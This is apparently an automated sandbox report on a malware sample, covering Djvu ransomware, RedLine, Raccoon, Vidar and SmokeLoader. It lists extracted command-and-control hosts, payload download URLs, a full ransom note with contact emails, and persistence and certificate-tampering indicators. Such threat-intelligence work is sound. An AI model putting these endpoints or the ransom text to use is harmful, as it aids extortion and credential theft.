bazarloader | bac4bdaaae7da623a7ba01a0ddfe807c285a36afa6dc502429d407ba70fa4a73

Resubmissions

27-10-2021 18:57

211027-xl7fgsgcf3 10

27-10-2021 17:12

211027-vqtzvafge9 10

Analysis

max time kernel
1200s
max time network
1219s
submitted
01-01-1970 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Size

341KB
MD5

bb13f6d819f3b18ebbfe1fb2e0d6c1ed
SHA1

7449eecd5006784372a71b1f9f05f74bbe0cd0c7
SHA256

bac4bdaaae7da623a7ba01a0ddfe807c285a36afa6dc502429d407ba70fa4a73
SHA512

1763e7b5f21ae06af2da655166f46a958f6089e54b649a68cd9540d6623f9e08e51a87b0a856eaadd79824172a8920d997ae1936ca8eee79b85f5f5d7fdf41cd

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note

ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CcXGxzXf71 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0342gSd743dbOv2SYyMt1QQk2YtWoA73mCSYVUdqKt6wU7yASwQ

Emails

manager@mailtemp.ch

supporthelp@airmail.cc

URLs

https://we.tl/t-CcXGxzXf71

Extracted

Family

smokeloader

Version

2020

http://xacokuo8.top/

http://hajezey1.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32

Extracted

Family

redline

Botnet

11111

93.115.20.139:28978

Extracted

Family

vidar

Version

41.6

Botnet

754

https://mas.to/@lilocc

Attributes

profile_id
754

Extracted

Family

raccoon

Botnet

60e59be328fbd2ebac1839ea99411dccb00a6f49

Attributes

url4cnc
http://telegin.top/agrybirdsgamerept
http://ttmirror.top/agrybirdsgamerept
http://teletele.top/agrybirdsgamerept
http://telegalive.top/agrybirdsgamerept
http://toptelete.top/agrybirdsgamerept
http://telegraf.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept

rc4.plain

Extracted

Family

raccoon

Botnet

04256a88c32735dbae9e9e965ae6cfecb37a8ec5

Attributes

url4cnc
http://telegin.top/kaba4ello
http://ttmirror.top/kaba4ello
http://teletele.top/kaba4ello
http://telegalive.top/kaba4ello
http://toptelete.top/kaba4ello
http://telegraf.top/kaba4ello
https://t.me/kaba4ello

rc4.plain

Extracted

Family

redline

Botnet

SafeInstaller

185.183.32.161:80

Extracted

Family

raccoon

Botnet

b6c3d41f039fbc353edce408d14ca491fee838d3

Attributes

url4cnc
http://telegin.top/hiioBlacklight1
http://ttmirror.top/hiioBlacklight1
http://teletele.top/hiioBlacklight1
http://telegalive.top/hiioBlacklight1
http://toptelete.top/hiioBlacklight1
http://telegraf.top/hiioBlacklight1
https://t.me/hiioBlacklight1

rc4.plain

Extracted

Family

djvu

http://rlrz.org/lancer/get.php

Attributes

extension
.rivd
offline_id
WbO7bkwHxaepEmevfYYUBNgcxNJGpd7hoNKokRt1
payload_url
http://znpst.top/dl/build2.exe
http://rlrz.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CcXGxzXf71 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0342gSd743d

rsa_pubkey.plain

Extracted

Family

redline

Botnet

z0rm1on

185.215.113.94:15564

Extracted

Family

vidar

Version

41.6

Botnet

706

https://mas.to/@lilocc

Attributes

profile_id
706

Extracted

Family

redline

Botnet

MONEY-2021

2.56.214.190:59628

Extracted

Family

vidar

Version

41.5

Botnet

517

https://mas.to/@xeroxxx

Attributes

profile_id
517

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Detected Djvu ransomware 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1652-180-0x0000000000424141-mapping.dmp	family_djvu
behavioral1/memory/1652-179-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1952-183-0x0000000004510000-0x000000000462B000-memory.dmp	family_djvu
behavioral1/memory/1652-184-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2664-251-0x0000000000424141-mapping.dmp	family_djvu
behavioral1/memory/2664-263-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1296-81-0x0000000000520000-0x000000000053A000-memory.dmp	family_redline
behavioral1/memory/1736-159-0x0000000000610000-0x000000000062A000-memory.dmp	family_redline
behavioral1/memory/1824-195-0x0000000000500000-0x000000000051A000-memory.dmp	family_redline
behavioral1/memory/1604-268-0x0000000002C80000-0x0000000002C9C000-memory.dmp	family_redline
behavioral1/memory/1604-272-0x0000000004730000-0x000000000474B000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

regsvr32.exe

description pid process target process

PID 1752 created 1204 1752 regsvr32.exe Explorer.EXE
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 1752 created 1204	1752	regsvr32.exe	Explorer.EXE

Bazar/Team9 Loader payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\403F.dll	BazarLoaderVar5
C:\Users\Admin\AppData\Local\Temp\403F.dll	BazarLoaderVar5

Vidar Stealer 7 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1100-101-0x0000000000400000-0x0000000002F6F000-memory.dmp	family_vidar
behavioral1/memory/1100-100-0x0000000004740000-0x0000000004816000-memory.dmp	family_vidar
behavioral1/memory/1496-210-0x00000000002E0000-0x00000000003B6000-memory.dmp	family_vidar
behavioral1/memory/1496-228-0x0000000000400000-0x0000000002C15000-memory.dmp	family_vidar
behavioral1/memory/2396-288-0x00000000004A18CD-mapping.dmp	family_vidar
behavioral1/memory/2356-291-0x00000000002F0000-0x00000000003C6000-memory.dmp	family_vidar
behavioral1/memory/2396-292-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 63 IoCs

Processes:

1555.exe1555.exe2389.exe2C02.exe3843.exe49C2.exe5651.exe6511.exe6BD5.exe7587.exeC4A.exeD83.exeC4A.exe115B.exe13BD.exe16D9.exe1CE3.exeMXb89OH1.EXEWZEvHVXQ.exeC4A.exeC4A.exebuild2.exebuild2.exebuild3.exebuild3.exejjthwrumstsca.exeuethwrumstsca.exeuethwrumstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exejjthwrumstsca.exeuethwrumstsca.exeuethwruC4A.exeC4A.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exe

pid	process
1496	1555.exe
432	1555.exe
1296	2389.exe
1872	2C02.exe
1100	3843.exe
1044	49C2.exe
1416	5651.exe
916	6511.exe
832	6BD5.exe
1736	7587.exe
1952	C4A.exe
1496	D83.exe
1652	C4A.exe
1824	115B.exe
1324	13BD.exe
1604	16D9.exe
1032	1CE3.exe
1488	MXb89OH1.EXE
2120	WZEvHVXQ.exe
2404	C4A.exe
2664	C4A.exe
2356	build2.exe
2396	build2.exe
1196	build3.exe
2052	build3.exe
2892	jjthwru
2848	mstsca.exe
2908	uethwru
2788	mstsca.exe
2780	uethwru
3056	mstsca.exe
3064	mstsca.exe
2336	mstsca.exe
860	mstsca.exe
1688	mstsca.exe
2008	mstsca.exe
2572	mstsca.exe
2956	mstsca.exe
2496	mstsca.exe
2440	mstsca.exe
1740	mstsca.exe
1416	mstsca.exe
2128	mstsca.exe
2632	mstsca.exe
1400	mstsca.exe
2492	mstsca.exe
2712	mstsca.exe
2672	mstsca.exe
2464	jjthwru
2884	mstsca.exe
2888	uethwru
2288	mstsca.exe
1280	uethwru
2628	C4A.exe
1940	C4A.exe
300	mstsca.exe
2296	mstsca.exe
2688	mstsca.exe
1752	mstsca.exe
2392	mstsca.exe
2276	mstsca.exe
2056	mstsca.exe
2328	mstsca.exe

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

C4A.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.rivd	C4A.exe
File renamed	C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.rivd	C4A.exe

Tries to connect to .bazar domain 7 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.

Processes:

flow ioc

188 bluehail.bazar
189 whitestorm9p.bazar
136 reddew28c.bazar
137 bluehail.bazar
138 whitestorm9p.bazar
139 aqsouhyw.bazar
187 reddew28c.bazar
Deletes itself 1 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE

flow	ioc
188	bluehail.bazar
189	whitestorm9p.bazar
136	reddew28c.bazar
137	bluehail.bazar
138	whitestorm9p.bazar
139	aqsouhyw.bazar
187	reddew28c.bazar

pid	process
1204	Explorer.EXE

Loads dropped DLL 40 IoCs

Processes:

1555.exe2C02.exeregsvr32.exeWerFault.exeWerFault.exeC4A.execmd.execmd.exeC4A.exeC4A.exemsiexec.exemsiexec.exeWerFault.exeC4A.exeWerFault.exejjthwruregsvr32.exejjthwru

pid	process
1496	1555.exe
1872	2C02.exe
1752	regsvr32.exe
1336	WerFault.exe
1336	WerFault.exe
1336	WerFault.exe
1336	WerFault.exe
1336	WerFault.exe
1336	WerFault.exe
1336	WerFault.exe
2004	WerFault.exe
2004	WerFault.exe
2004	WerFault.exe
2004	WerFault.exe
1952	C4A.exe
1948	cmd.exe
1820	cmd.exe
1652	C4A.exe
1652	C4A.exe
2404	C4A.exe
2972	msiexec.exe
2920	msiexec.exe
2092	WerFault.exe
2092	WerFault.exe
2092	WerFault.exe
2092	WerFault.exe
2664	C4A.exe
2664	C4A.exe
2664	C4A.exe
2664	C4A.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2892	jjthwru
1684	regsvr32.exe
2464	jjthwru

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1316 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1316	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

C4A.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\94083928-3961-499c-8af9-20acea08c6f8\\C4A.exe\" --AutoStart"	C4A.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

92 api.2ip.ua
107 api.2ip.ua
180 api.2ip.ua
91 api.2ip.ua

flow	ioc
92	api.2ip.ua
107	api.2ip.ua
180	api.2ip.ua
91	api.2ip.ua

Suspicious use of SetThreadContext 25 IoCs

Processes:

bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exeC4A.exeC4A.exebuild2.exebuild3.exemstsca.exeuethwrumstsca.exemstsca.exeregsvr32.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeuethwruC4A.exemstsca.exemstsca.exemstsca.exemstsca.exe

description	pid	process	target process
PID 320 set thread context of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 1496 set thread context of 432	1496	1555.exe	1555.exe
PID 1952 set thread context of 1652	1952	C4A.exe	C4A.exe
PID 2404 set thread context of 2664	2404	C4A.exe	C4A.exe
PID 2356 set thread context of 2396	2356	build2.exe	build2.exe
PID 1196 set thread context of 2052	1196	build3.exe	build3.exe
PID 2848 set thread context of 2788	2848	mstsca.exe	mstsca.exe
PID 2908 set thread context of 2780	2908	uethwru	uethwru
PID 3056 set thread context of 3064	3056	mstsca.exe	mstsca.exe
PID 2336 set thread context of 860	2336	mstsca.exe	mstsca.exe
PID 1752 set thread context of 1052	1752	regsvr32.exe	chrome.exe
PID 1688 set thread context of 2008	1688	mstsca.exe	mstsca.exe
PID 2572 set thread context of 2956	2572	mstsca.exe	mstsca.exe
PID 2496 set thread context of 2440	2496	mstsca.exe	mstsca.exe
PID 1740 set thread context of 1416	1740	mstsca.exe	mstsca.exe
PID 2128 set thread context of 2632	2128	mstsca.exe	mstsca.exe
PID 1400 set thread context of 2492	1400	mstsca.exe	mstsca.exe
PID 2712 set thread context of 2672	2712	mstsca.exe	mstsca.exe
PID 2884 set thread context of 2288	2884	mstsca.exe	mstsca.exe
PID 2888 set thread context of 1280	2888	uethwru	uethwru
PID 2628 set thread context of 1940	2628	C4A.exe	C4A.exe
PID 300 set thread context of 2296	300	mstsca.exe	mstsca.exe
PID 2688 set thread context of 1752	2688	mstsca.exe	mstsca.exe
PID 2392 set thread context of 2276	2392	mstsca.exe	mstsca.exe
PID 2056 set thread context of 2328	2056	mstsca.exe	mstsca.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1336 1100 WerFault.exe 3843.exe
2004 1044 WerFault.exe 49C2.exe
2092 1496 WerFault.exe D83.exe
2584 2396 WerFault.exe build2.exe

pid	pid_target	process	target process
1336	1100	WerFault.exe	3843.exe
2004	1044	WerFault.exe	49C2.exe
2092	1496	WerFault.exe	D83.exe
2584	2396	WerFault.exe	build2.exe

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

uethwrujjthwrujjthwruuethwrubb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exe2C02.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1555.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2C02.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1555.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uethwru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1555.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2C02.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2C02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjthwru

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2428 schtasks.exe
2660 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2020 taskkill.exe
2164 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2428	schtasks.exe
2660	schtasks.exe

pid	process
2020	taskkill.exe
2164	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

C4A.exeC4A.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	C4A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C4A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	C4A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C4A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6